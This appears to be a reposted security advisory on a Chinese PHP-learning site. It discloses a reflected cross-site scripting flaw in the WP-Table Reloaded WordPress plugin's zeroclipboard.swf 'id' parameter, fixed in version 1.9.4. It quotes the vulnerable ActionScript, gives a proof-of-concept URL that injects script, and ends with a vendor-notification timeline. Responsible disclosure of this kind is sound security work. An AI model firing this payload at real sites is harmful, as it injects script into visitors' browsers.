来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 作者: hip [Insight-Labs]联系方式: hip@insight-labs.org | Website: http://insight-labs.org软件地址: http://downloads.wordpress.org/plugin/wp-table-reloaded.latest-stable.zip开发这网站: http......
|
作者: hip [Insight-Labs]
联系方式: hip@insight-labs.org | Website: http://insight-labs.org
软件地址: http://downloads.wordpress.org/plugin/wp-table-reloaded.latest-stable.zip
开发这网站: http://tobias.baethge.com/
测试平台: XPsp3
影响版本: 1.9.4 before
简介:
WP-Table Reloaded enables you to create and manage tables,
without having to write HTML code, and it adds valuable functions for your visitors.
————————————————————————————————————————-
# XSS – Proof Of Concept:
vulnerable path:
/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf
vulnerabile parameter:id
piece of code:
flashvars = LoaderInfo(this.root.loaderInfo).parameters;
this.domId = flashvars.id; <– vulnerable input
ExternalInterface.call(“ZeroClipboard.dispatch”, domId, “mouseOver”, null); <- vulnerable call
POC:
www.2cto.com /wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
————————————————————————————————————————-
路线图
– Vendor was notified on the 23/01/2013
– Vendor released version 1.9.4 on 27/01/2013 Fixed the bug
– Reward 50 USD from white fir design on 30/01/2013
————————————————————————————————————————-
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
